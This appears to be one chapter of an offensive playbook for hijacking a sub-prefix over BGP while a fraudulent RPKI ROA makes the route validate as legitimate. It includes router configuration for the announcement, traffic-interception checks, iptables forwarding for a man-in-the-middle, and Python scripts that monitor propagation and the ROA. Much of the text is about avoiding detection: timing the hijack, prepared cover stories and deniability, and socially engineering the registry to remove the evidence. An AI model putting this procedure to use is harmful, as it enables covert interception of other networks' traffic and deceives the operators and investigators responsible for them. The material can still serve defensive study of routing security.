Playbook 3: Prefix hijacking with RPKI validation cover¶
Why this is different from normal hijacking¶
This is the payoff for phases 1-2. We’re now executing what appears to be a standard sub-prefix hijack (node 1.1.1 from the BGP hijacking tree), but with a critical difference:
When validators check our announcement, they will return VALID.
This is the essence of a control-plane attack. We’re not bypassing validation. We’re not exploiting the absence of validation. We’ve corrupted the validation system itself so that it endorses our attack.
From the purple page distinction:
Data-plane hijack: “I claim to originate this prefix” (forged letter, might be caught by validation)
Control-plane poisoning: “The Registry says I’m authorised” (edited the ledger, validation confirms our claim)
Defenders who check RPKI validation status will see our hijack marked VALID. Their security tools designed to catch hijacks via RPKI will not alert. We’re operating with the Guild Registry’s blessing, because we’ve edited the Registry.
Attack tree path¶
Primary: 1 → 1.1 “Prefix hijacking” → 1.1.1 “Sub-prefix hijacking” → 1.1.1.1 “Announcing a more specific prefix than the legitimate one”
Supporting: 1.3.3.1 “Long-term hijacking for espionage” - this hijack can persist because validation marks it as legitimate
Evasion: 1.6.1.3 “Mimicking legitimate announcements” - our announcement appears legitimate because RPKI says it is
Phase 3 Actions¶
Action 3.1: Announce target sub-prefix¶
Intent
Announce 203.0.113.128/25 (a more-specific prefix within the victim's /24) from our AS64513, exploiting longest-prefix-match routing to intercept traffic destined for 203.0.113.128-255, whilst maintaining RPKI VALID status thanks to the fraudulent ROA created in phase 2.
Preconditions
Phase 2 complete: fraudulent ROA published for 48+ hours without revocation
Validation deployment mapped: identified target region with <50% validation enforcement
Monitoring active: confirms fraudulent ROA still present
We have a BGP peering session in the target region
Cover story prepared for “why are we announcing this prefix”
Execution method
From a router with an eBGP session to a peer in the target region (APAC, selected based on the phase 2 mapping):
router bgp 64513
 address-family ipv4 unicast
  network 203.0.113.128/25 route-map SET_COMMUNITIES
 exit-address-family
!
! Community and origin chosen to resemble routine traffic engineering
! (origin "igp" looks more deliberate than "incomplete")
route-map SET_COMMUNITIES permit 10
 set community 64513:100
 set origin igp
Apply configuration:
vtysh -c "clear ip bgp * soft out"
Wait for announcement propagation (30-180 seconds typical).
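A quick way to confirm the announcement is reaching public collectors, without logging into a route server, is to query a route-collector API. The sketch below uses RIPEstat's routing-status data call; the endpoint is public, but the exact response field names are assumptions to verify against the RIPEstat documentation, and the prefix and ASN are this playbook's documentation values.

```python
#!/usr/bin/env python3
"""Propagation check against public RIS collectors via RIPEstat (sketch).
Response field names are assumptions -- verify against the RIPEstat docs."""
import json
import urllib.request

PREFIX = "203.0.113.128/25"   # our announced more-specific
OUR_ASN = "64513"

url = f"https://stat.ripe.net/data/routing-status/data.json?resource={PREFIX}"
with urllib.request.urlopen(url, timeout=30) as resp:
    data = json.load(resp)["data"]

# Defensive access: print whatever visibility/origin information is returned
print("visibility:", data.get("visibility"))
print("first_seen:", data.get("first_seen"))
print("last_seen: ", data.get("last_seen"))

# Crude origin check: is our ASN mentioned anywhere in the reply?
seen = OUR_ASN in json.dumps(data)
print("AS" + OUR_ASN, "visible in collector data" if seen else "not visible yet")
```

Collectors lag live routing by a few minutes, so an empty result immediately after the soft clear is not yet a failure signal (see the timing notes below).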
Expected technical effect
Within 5 minutes of announcement:
Routing impact:
Routers applying longest-prefix-match will prefer our /25 over victim’s /24 for addresses 203.0.113.128-255
Traffic from target region destined for 203.0.113.150 (within our /25) routes via AS64513
Traffic destined for 203.0.113.10 (outside our /25) continues routing via AS65001
Split routing achieved: we intercept subset of victim’s traffic
RPKI validation result (CRITICAL):
Validators check our announcement against ROAs
Our fraudulent ROA (created in phase 2) authorises AS64513 for 203.0.113.0/24 with maxLength /25
Validation returns: VALID ✓
Networks enforcing RPKI validation will accept and propagate our announcement because validators say it’s legitimate
This is the control-plane attack succeeding. We’re not evading validation. Validation is endorsing us.
Comparison to data-plane hijack:
Without our fraudulent ROA: announcement would be marked INVALID, dropped by validating networks
With our fraudulent ROA: announcement marked VALID, accepted by all networks (validating and non-validating)
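The decision those validators make can be reproduced in a few lines. The sketch below is a simplified, hand-fed illustration of RFC 6811-style route origin validation; real validators consume signed RPKI objects rather than tuples typed into a script, but the logic shows concretely why the maxLength of /25 on the fraudulent ROA turns our more-specific announcement VALID.

```python
#!/usr/bin/env python3
"""Why the hijacked /25 evaluates VALID: simplified RFC 6811-style
route origin validation. Illustrative only; real validators consume
signed RPKI data, not hand-typed tuples."""
from ipaddress import ip_network

# Validated ROA payloads (VRPs) as (prefix, max_length, origin_asn).
# The second entry is the fraudulent ROA created in phase 2.
VRPS = [
    (ip_network("203.0.113.0/24"), 24, 65001),   # victim's legitimate ROA
    (ip_network("203.0.113.0/24"), 25, 64513),   # fraudulent ROA, maxLength 25
]

def origin_validation(prefix_str: str, origin_asn: int) -> str:
    """Return VALID / INVALID / NOT_FOUND for an announcement."""
    prefix = ip_network(prefix_str)
    covered = False
    for vrp_prefix, max_len, vrp_asn in VRPS:
        if prefix.subnet_of(vrp_prefix):          # this VRP covers the announcement
            covered = True
            if vrp_asn == origin_asn and prefix.prefixlen <= max_len:
                return "VALID"
    return "INVALID" if covered else "NOT_FOUND"

# Victim's own /24 from AS65001 stays VALID.
print("203.0.113.0/24   from AS65001:", origin_validation("203.0.113.0/24", 65001))
# Our /25 from AS64513 is VALID only because the fraudulent ROA exists.
print("203.0.113.128/25 from AS64513:", origin_validation("203.0.113.128/25", 64513))
```

Delete the second VRP and the /25 announcement flips to INVALID (covered by a ROA, but wrong origin and excess length), which is exactly the data-plane-hijack outcome described above.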
Expected observational footprint
BGP announcement footprint (MEDIUM VISIBILITY):
BGP UPDATE message visible in peer logs, route reflectors, public collectors
A more-specific prefix within a known allocation may trigger alerts (IF such monitoring exists)
RPKI validation check will return VALID (appears legitimate, reduces alert priority)
NetFlow impact (HIGH VISIBILITY if monitored):
Traffic volume to 203.0.113.128-255 shifts from AS65001 path to AS64513 path
A victim organisation monitoring its own traffic will see inbound volume drop for the affected range
This is the most visible indicator of the hijack, but it requires active NetFlow monitoring
Detection by public monitors (MEDIUM):
BGPmon, RIPE RIS, Cloudflare Radar will see new more-specific announcement
Public monitors will check RPKI status
Status returned: VALID (makes hijack appear less suspicious)
Manual investigation required to notice: “wait, why is AS64513 announcing AS65001’s space?”
Detection likelihood:
Automated RPKI-based detection: Low (our announcement validates as VALID)
Traffic volume monitoring: High (if victim monitors NetFlow)
Manual BGP monitoring: Medium (requires human noticing unexpected AS announcing victim’s space)
Peer notification: Low (peers see VALID announcement, less likely to question)
Manual steps
Before announcement:
Verify fraudulent ROA still present (check monitoring from Action 2.3)
Confirm peer session is stable (don’t announce during session flapping)
Have abort procedure ready (withdrawal configuration prepared)
Verify the time falls within business hours in the target region (appears routine; easier to social-engineer if questioned)
After announcement:
Monitor BGP session stability (announcement may cause peer to drop session if they have undocumented filters)
Verify announcement propagated (check public route servers, looking glasses)
Confirm RPKI validation returns VALID (query multiple validators; a query sketch follows this list)
Monitor for revocation of fraudulent ROA (if revoked, our announcement becomes INVALID immediately)
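For the "query multiple validators" step above, one convenient external data point is RIPEstat's RPKI validation data call, sketched below. The endpoint parameters and response fields are assumptions to confirm against the RIPEstat documentation; cross-check against a locally run validator (routinator, rpki-client or Fort) as well, so a single stale cache cannot mislead us.

```python
#!/usr/bin/env python3
"""Third-party RPKI origin-validation check via RIPEstat (sketch).
Endpoint and response field names are assumptions -- confirm against
the RIPEstat documentation before relying on the output."""
import json
import urllib.request

ORIGIN_ASN = "AS64513"
PREFIX = "203.0.113.128/25"

url = ("https://stat.ripe.net/data/rpki-validation/data.json"
       f"?resource={ORIGIN_ASN}&prefix={PREFIX}")
with urllib.request.urlopen(url, timeout=30) as resp:
    data = json.load(resp)["data"]

# Expected status values: "valid", "invalid" or "unknown"/"not-found"
print(f"{PREFIX} originated by {ORIGIN_ASN}: {data.get('status')}")
for roa in data.get("validating_roas", []):
    print("  covering ROA:", roa)
```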
Timing uncertainty
Announcement propagation: 30-180 seconds typical, but can vary:
Immediate: well-connected peers, stable sessions
5-10 minutes: route reflectors with pacing timers
Never: if peer has unexpected prefix filter we didn’t detect in reconnaissance
RPKI validation check timing:
Routers poll validators at 30-60 minute intervals typically
Routers that already cached “no ROA” result might take hours to recheck
Routers that haven’t polled since our fraudulent ROA was created will see VALID immediately
Traffic shift timing:
Existing TCP connections continue on old path until timeout
New connections follow new path immediately
Full traffic shift: 5-30 minutes depending on connection duration patterns
Budget reality check
This announcement will succeed in regions where:
Peers don’t have comprehensive prefix filters (common)
RPKI validation is not deployed or not enforced (40% of networks globally)
More-specific announcements are not specifically monitored (most networks)
It will partially succeed in regions where:
Some peers validate (traffic splits between validating and non-validating peers)
Monitoring exists but alerting thresholds not tuned for /25 announcements
Manual investigation required, which takes time (giving us operational window)
Action 3.2: Verify traffic interception¶
Intent
Confirm that traffic destined for 203.0.113.128-255 is actually routing via our AS64513, not just that our announcement propagated.
Preconditions
Action 3.1 complete: announcement has propagated (5+ minutes elapsed)
We have visibility into traffic arriving at our AS64513 infrastructure
Test endpoints available in target region to generate traffic
Execution method
From a test endpoint in the target region (APAC):
# Send traffic to an address within our hijacked /25
traceroute 203.0.113.150
# Expected: the path should show our AS64513
# If the path shows AS65001, the hijack has not succeeded in this region
# Verify from multiple source addresses; note -s only selects among this
# host's own locally configured addresses, so ideally repeat the test from
# separate vantage points across the region
for ip in 198.51.100.10 198.51.100.20 203.0.0.50; do
    echo "Testing from $ip"
    traceroute -s "$ip" 203.0.113.150
done
Monitor traffic arriving at our AS64513 border routers:
# Check for traffic to hijacked prefix
tcpdump -i eth0 -n 'dst net 203.0.113.128/25'
# Should see packets arriving from upstream peers
# If no packets seen within 10 minutes, hijack not effective
Expected technical effect
Within 10 minutes of Action 3.1:
Traffic interception confirmed:
Test traceroutes show path via AS64513
tcpdump shows packets arriving for 203.0.113.128-255
Traffic volume correlates with expected patterns for this address space
Success indicators:
100% of test endpoints route via our AS: complete hijack success in target region
50-80% of test endpoints route via our AS: partial success (mixed validation deployment)
0-20% of test endpoints route via our AS: hijack mostly failed (higher validation enforcement than phase 2 detected)
Expected observational footprint
Traffic testing footprint:
Traceroute packets visible in transit (COMMON, not suspicious by itself)
Multiple traceroutes from same sources might appear like troubleshooting (PLAUSIBLE)
tcpdump on border interface is internal-only, no external footprint
If traffic is actually reaching our AS:
Destination 203.0.113.150 will see connection attempts from unexpected source IPs (our test endpoints)
If destination is a monitored service, security team may investigate “unusual connection patterns”
This footprint only exists if we actually send application-layer traffic, not just ICMP/traceroute
Detection likelihood: Low to Medium. Traceroutes appear like routine troubleshooting. Only suspicious if correlated with BGP announcement timing.
Manual steps
Verify test endpoints are geographically distributed across target region (single test point might be anomalous)
Document which peers are routing traffic to us (identifies non-validating peers; a public-collector survey sketch follows this list)
Document which peers are NOT routing to us (identifies validating peers, useful for future operations)
If hijack partially successful, calculate percentage of traffic intercepted
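To support the two "document which peers" items above, public route collectors give an approximate picture of who accepted the /25. The sketch below tallies, per RIS collector, which origin AS its peers report; the response layout (rrcs / peers / asn_origin) of RIPEstat's looking-glass data call is an assumption to verify, and collector visibility only proxies for routing preference rather than proving a network is forwarding traffic to us.

```python
#!/usr/bin/env python3
"""Approximate 'who accepted our /25' survey from public RIS collectors
(sketch). Field names for the RIPEstat looking-glass data call are
assumptions; verify against the RIPEstat docs."""
import json
import urllib.request
from collections import Counter

PREFIX = "203.0.113.128/25"

url = f"https://stat.ripe.net/data/looking-glass/data.json?resource={PREFIX}"
with urllib.request.urlopen(url, timeout=30) as resp:
    data = json.load(resp)["data"]

for rrc in data.get("rrcs", []):
    counts = Counter()
    for peer in rrc.get("peers", []):
        # asn_origin is assumed to hold the origin AS observed by this peer
        counts[str(peer.get("asn_origin"))] += 1
    print(rrc.get("rrc", "unknown"), dict(counts))   # e.g. RRC00 {'64513': 12}
```

Collectors where no peer carries the /25 at all are candidates for the "validating or filtering" column.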
Timing uncertainty
Traffic shift can take 5-30 minutes due to:
Existing TCP connections continuing on old path
Route propagation delays between peers
Some routers slower to recompute best paths
If no traffic seen within 30 minutes, hijack has likely failed or is only effective in very limited scope.
Action 3.3: Establish forwarding to maintain service¶
Intent
Forward intercepted traffic to the legitimate destination (AS65001) to avoid causing an obvious outage, implementing the "polite hijack with interception" pattern, which reduces detection likelihood whilst maintaining traffic visibility.
Preconditions
Action 3.2 complete: traffic interception confirmed
We have established IP connectivity to reach the victim's actual servers at 203.0.113.128-255 via a path that our own /25 announcement does not attract (e.g. a tunnel or a pinned next-hop towards the legitimate /24 path); otherwise forwarded traffic loops back to us
Forwarding infrastructure configured and tested
Execution method
Configure routing and NAT to forward traffic after inspection:
! On the border router receiving hijacked traffic (FRR/vtysh): hand it to our inspection device
ip route 203.0.113.128/25 198.51.100.1
# On the inspection device (Linux): destination addresses are unchanged, so no
# DNAT is needed; SNAT makes the victim's replies return via our infrastructure
iptables -t nat -A POSTROUTING -d 203.0.113.128/25 -j SNAT --to-source <our_exit_IP>
# Enable IP forwarding
sysctl -w net.ipv4.ip_forward=1
This configuration:
Receives traffic from our BGP announcement
Optionally inspects/logs traffic
Forwards traffic to victim’s actual infrastructure
Appears to users like normal service (minimal disruption)
Expected technical effect
Traffic flow after forwarding:
User → AS64513 (our AS) → inspection → AS65001 (victim) → response → AS64513 → User
Service impact:
Users experience additional latency (1-5ms typically for single hop)
Services remain functional (forwarding maintains reachability)
Connection quality slightly degraded (extra hop increases packet loss probability)
Most users will not notice (small latency increase within normal variance)
Detection impact:
No obvious service outage (reduces victim awareness)
Traffic continues functioning (no user complaints to investigate)
Victim sees traffic arriving from our exit IPs instead of original sources (SUSPICIOUS if examined)
This implements “polite hijacking” from node 1.5.1.1 “Man-in-the-middle attacks” in the hijacking tree. We’re intercepting, not disrupting.
Expected observational footprint
Forwarding footprint (HIGH RISK if examined):
Victim’s servers see connections from our exit IPs, not from original client IPs (ANOMALOUS)
IP-to-ASN and whois lookups on our exit IPs will show they belong to AS64513 (SUSPICIOUS)
If victim has NetFlow monitoring showing “traffic now arriving from AS64513 instead of usual sources”: DETECTABLE
HTTP headers, TLS SNI, or application logs may show our intermediary hop (depending on protocol)
This is the highest-risk phase for technical detection. If victim has comprehensive traffic analysis, they will notice:
Source IPs changed
TTL values decreased (extra hop visible)
Latency patterns changed
Traffic now comes from AS64513 instead of expected peers
Detection likelihood: High if victim has detailed traffic monitoring. Low if victim only monitors for outages.
Manual steps
Verify forwarding works before committing (test with single connection first)
Monitor for connection failures (forwarding may break some protocols if not configured correctly)
Watch for victim detection indicators (sudden increase in abuse complaints, peering session changes, etc.)
Document traffic patterns for operational security (which services are most used, when, from where)
Timing uncertainty
Forwarding configuration: instant
Traffic flow establishment: 30-60 seconds (TCP connections need to establish through the new path)
Service stability: monitor for 2-4 hours to ensure no unexpected protocol breaks
Some protocols may break:
Path MTU discovery issues (extra hop may cause fragmentation)
Protocols with embedded IP addresses (FTP, SIP, etc.)
TLS certificate validation if our forwarding is not transparent
Budget reality check
Forwarding maintains service, which reduces detection. Most organisations primarily monitor for outages, not for traffic path changes. As long as services remain available, investigation priority is low.
However, sophisticated organisations with NetFlow analysis and traffic baselining will detect this quickly (within hours). The forwarding buys time, not invisibility.
Action 3.4: Monitoring and operational security during hijack¶
Intent
Maintain continuous monitoring of hijack effectiveness, ROA status, and detection indicators whilst the hijack is active, providing early warning so the abort procedure can be executed if the operation is detected or compromised.
Preconditions
Action 3.3 complete: hijack active, forwarding established
Monitoring from phase 2 (Action 2.3) still running
Alert mechanisms configured
Execution method
Deploy comprehensive monitoring dashboard tracking:
ROA status monitoring (from phase 2, continue running):
# Same script from Action 2.3, but now CRITICAL
# If the fraudulent ROA is revoked, our announcement becomes INVALID immediately
# (a minimal stand-in sketch for this watcher appears after this list)
BGP announcement status:
# Check our announcement remains visible on public route servers.
# These are usually reached interactively (telnet) rather than by scripted ssh;
# at the route server prompt, run:
#   show ip bgp 203.0.113.128/25
# e.g. telnet route-views.oregon-ix.net / telnet route-server.ip.telia.net
# (or re-run the propagation check sketch from Action 3.1)
Traffic volume monitoring:
# Monitor intercepted traffic volume
iftop -i eth0 -f "dst net 203.0.113.128/25" -t -s 10
Detection indicators:
Check our AS64513 border for unexpected BGP session resets (peers dropping us)
Monitor abuse@ email for complaints
Watch public BGP forums/lists for mentions of 203.0.113.0/24
Check BGPmon, Cloudflare Radar for “this announcement is suspicious” flags
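The Action 2.3 script is not reproduced in this playbook. As a stand-in, the sketch below (referenced in the ROA status item above) polls a locally running Routinator instance and raises the abort trigger when the covering VRP for AS64513 disappears; the output format of routinator vrps varies between versions, so the string matching is an assumption to adapt.

```python
#!/usr/bin/env python3
"""Stand-in ROA/VRP watcher (sketch). Polls a local Routinator cache and
flags when the covering VRP for our origin disappears. Adapt the string
matching to the actual `routinator vrps` output format of your version."""
import subprocess
import sys
import time

ORIGIN = "64513"                    # matches "AS64513" or bare "64513"
COVERING_PREFIX = "203.0.113.0/24"
POLL_SECONDS = 300                  # local cache cadence, not repository cadence

def covering_vrp_present() -> bool:
    # Default vrps output is CSV-like lines: ASN, IP Prefix, Max Length, Trust Anchor
    out = subprocess.run(["routinator", "vrps"], capture_output=True,
                         text=True, check=True).stdout
    return any(ORIGIN in line and COVERING_PREFIX in line
               for line in out.splitlines())

while True:
    if not covering_vrp_present():
        print("ABORT TRIGGER: covering VRP no longer present", file=sys.stderr)
        sys.exit(1)   # hand off to the withdrawal procedure (Action 3.5)
    time.sleep(POLL_SECONDS)
```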
Expected technical effect
Monitoring provides:
Real-time confirmation hijack remains active
Early warning if fraudulent ROA is revoked (abort trigger)
Detection of victim countermeasures (new ROAs, filtered announcements, etc.)
Operational awareness of hijack impact (traffic volume, service impact)
Alert triggers for IMMEDIATE ABORT:
Fraudulent ROA disappears from validators
Our BGP announcement rejected by multiple peers simultaneously
Abuse complaints received
Public BGP monitoring services flag our announcement as suspicious
Expected observational footprint
Monitoring activities:
Sessions to public route servers and looking glasses (COMMON; thousands of networks do this)
Traffic volume monitoring internal-only (no external footprint)
Email monitoring internal-only (no external footprint)
No additional footprint beyond hijack itself.
Manual steps
Designate person responsible for monitoring 24/7 during hijack (cannot be unattended)
Document abort procedure (one-command withdrawal of announcement)
Set up escalation: if monitoring person detects abort trigger, who do they notify?
Prepare a cover story in case we are contacted (see Action 3.5)
Timing uncertainty
Monitoring is continuous. No timing uncertainty, but human factors:
Monitoring fatigue (person watching dashboard for hours)
Alert fatigue (false positives from monitoring tools)
Response time lag (how quickly can we execute abort if needed)
Budget a 15-30 second response time from detection to abort execution in the worst case.
Action 3.5: Controlled withdrawal¶
Intent
Withdraw the hijack announcement in a controlled manner that minimises attribution and preserves operational security for future operations, appearing like routine network maintenance rather than a detected attack.
Preconditions
Hijack has achieved operational objective (traffic intercepted for required duration)
OR abort trigger detected (fraudulent ROA revoked, detection indicators observed)
Withdrawal timing selected (business hours preferred, appears like maintenance)
Execution method
Graceful withdrawal sequence:
router bgp 64513
address-family ipv4 unicast
no network 203.0.113.128/25
Apply withdrawal:
vtysh -c "clear ip bgp * soft out"
Wait 5 minutes, then verify the withdrawal has propagated. Note that ROA queries (routinator vrps) are the wrong check here, as they report ROAs rather than announcements; instead re-check the route servers from Action 3.4 or re-run the propagation sketch from Action 3.1:
# At a public route server prompt, the prefix should no longer be present
#   show ip bgp 203.0.113.128/25
Withdrawal timing strategy:
Best case: withdraw during scheduled maintenance window announced in advance
Send email to peers 24 hours before: “Scheduled maintenance, expect routing changes”
Withdraw during announced window
Appears completely legitimate
Abort case: withdraw immediately when detection occurs
No advance notice possible
Execute withdrawal as fast as possible
Prepare cover story: “Emergency maintenance due to configuration error”
Expected technical effect
Within 5 minutes of withdrawal:
Our announcement disappears from BGP tables
Traffic returns to routing via AS65001 (legitimate path)
Service impact: potential brief disruption as routes reconverge (30-60 seconds)
RPKI validation status: no longer relevant (no announcement to validate)
Post-withdrawal state:
Fraudulent ROA still exists (if not revoked)
Can be used for future operations
If ROA is discovered later, we have deniability: “We never actually announced that prefix, ROA was created in error”
Expected observational footprint
Withdrawal footprint:
BGP WITHDRAW message visible (EXPECTED, normal network operations)
If timed with maintenance announcement: appears completely legitimate
If sudden abort: appears like emergency fix, but plausible
Post-withdrawal investigation risk:
Victim may analyze historical BGP data and discover our announcement existed
Timeline correlation: fraudulent ROA creation → announcement → withdrawal (SUSPICIOUS)
If investigation reaches this depth: cover story needed
Cover story for post-investigation: “Our operations team was testing RPKI deployment and mistakenly created ROA for incorrect prefix due to spreadsheet error. When we discovered the error, we immediately withdrew any announcements and corrected the ROA. We apologize for any confusion this caused.”
This cover story is plausible because RPKI is complex and these errors genuinely happen.
Manual steps
Verify withdrawal command syntax before execution (fat-finger during abort is catastrophic)
Confirm withdrawal propagated (check multiple looking glasses)
Monitor for service restoration at victim (indicates traffic routing normally)
Document withdrawal timestamp for audit trail
Decide whether to revoke fraudulent ROA or leave it (leaving it enables future operations, but increases long-term attribution risk)
Timing uncertainty
Withdrawal propagation: 30-180 seconds (same as announcement, but usually faster)
Service reconvergence: 30-90 seconds (victim's routes become preferred again)
If abort triggered, execute within 60 seconds of detection.
Budget reality check
Most hijacks are detected during announcement or during the active phase, not during withdrawal. A clean withdrawal often goes unnoticed because the victim organisation is focused on "service is restored, crisis over" rather than forensic analysis of what happened.
Leaving fraudulent ROA in place is risky but enables future operations. Revoking it provides clean break but requires RIR account access (which may be lost if credentials were changed after detection).
Recording the mess honestly¶
The forwarding problem¶
Action 3.3 (forwarding) is technically complex and protocol-dependent:
HTTP/HTTPS: mostly works, but TLS certificate validation may fail if our forwarding terminates connections
DNS: works but our responses come from wrong source IP (detectable)
SMTP: works, but with SNAT the victim's mail servers see our exit IPs as the connecting hosts, so strict SPF checking causes rejections/bounces
Protocols with embedded IPs (FTP, SIP, H.323): often break entirely
Gaming protocols, VoIP, video streaming: high packet loss sensitivity, noticeable quality degradation
Testing forwarding comprehensively is its own operation. This playbook assumes simple TCP forwarding. Real-world implementation requires protocol-specific handling.
The detection timing gamble¶
Phase 3 success depends on victim NOT having:
Real-time BGP monitoring with alerting
NetFlow analysis showing source AS changes
RPKI audit trails showing fraudulent ROA creation
Automated anomaly detection on traffic patterns
If victim has any of these, detection timing is:
BGP monitoring: 5-30 minutes (depends on check interval)
NetFlow analysis: 1-4 hours (depends on analysis frequency)
RPKI audit: days to weeks (requires manual review, rarely done)
Anomaly detection: 10-60 minutes (depends on baseline and alerting sensitivity)
We’re gambling that victim doesn’t have comprehensive monitoring. ~60% of networks don’t. But the 40% that do will detect quickly.
The persistence versus attribution trade-off¶
Longer hijack duration = more operational value but higher detection risk and stronger attribution evidence
Short hijack (5-10 minutes):
Pros: low detection likelihood, appears like transient issue
Cons: limited operational value, may not accomplish objective
Medium hijack (1-4 hours):
Pros: reasonable operational window, still plausibly “testing gone wrong”
Cons: detected by automated systems if they exist
Long hijack (days/weeks):
Pros: maximum operational value, sustained access
Cons: inevitable detection, forensic timeline clearly shows deliberate action
Node 1.3.3.1 “Long-term hijacking for espionage” from the hijacking tree requires accepting high attribution risk. Most operations should target medium duration.
Where best practice lost to budget reality¶
Best practice says: organisations should have real-time BGP monitoring, NetFlow analysis, RPKI audit logging, traffic baselining, and automated anomaly detection.
Budget reality says: most organisations have subset of these, and monitoring that exists is often tuned to avoid alert fatigue, meaning slow detection response.
The gap is substantial:
<20% of networks have real-time BGP monitoring with alerting
<40% have NetFlow collection, fewer analyze it regularly
<10% have RPKI audit trails, fewer review them
<5% have automated traffic anomaly detection
Phase 3 succeeds most often against the 60-80% of networks with partial or absent monitoring.
Success criteria for phase 3¶
Phase 3 succeeds when:
Traffic interception confirmed (Action 3.2 verified)
Interception sustained for required duration (operational objective achieved)
Withdrawal completed cleanly (no detection during withdrawal)
RPKI validation marked our hijack as VALID throughout (control-plane attack confirmed)
Phase 3 partially succeeds when:
Traffic intercepted from some regions but not others (validation deployment inconsistent)
Detection occurred but operational objective achieved before abort
Hijack worked but forwarding broke some protocols (partial service disruption)
Phase 3 fails when:
No traffic intercepted (hijack announcement not propagated or preferred)
Immediate detection and countermeasures (fraudulent ROA revoked within minutes)
Service outage caused customer complaints leading to rapid investigation
Control-plane attack assessment¶
This three-phase operation is a true control-plane attack because:
We manipulated RPKI ROAs (the authoritative control-plane state)
Validators endorsed our hijack as VALID (corrupted truth, not bypassed checks)
Defensive systems designed to prevent hijacks via RPKI failed to detect it because we corrupted their source of truth
From the control-plane vs data-plane distinction:
This was not forging letters (data-plane). This was editing the Guild Registry (control-plane).
Networks that implemented RPKI validation as defense mechanism were compromised by the very system meant to protect them. Their validators returned VALID because we poisoned the validation infrastructure.
That is the essence of control-plane attack: not bypassing security, but corrupting the foundations security depends on.
Post-operation cleanup¶
After withdrawal, the attack chain leaves evidence:
Persistent artifacts:
Fraudulent ROA (may still exist in RPKI repositories)
BGP historical data (announcement visible in route collectors)
NetFlow historical data (traffic path change visible)
Audit logs (RIR ROA creation, modification timestamps)
Cleanup options:
Option A: Revoke fraudulent ROA
Removes primary evidence
Requires RIR account access (may be lost)
Creates audit trail of revocation (timestamped, visible)
Option B: Leave fraudulent ROA
Maintains capability for future operations
Increases long-term attribution risk
If discovered months later, harder to claim “mistake”
Option C: Social engineering ROA removal
Contact RIR claiming “error”, request removal
Plausible if done quickly after attack
Creates human interaction trail (phone calls, emails)
Recommended: Option A if accessible, Option C if not.
Do NOT leave fraudulent ROA indefinitely. Long-term presence is strongest evidence of deliberate control-plane attack versus operational error.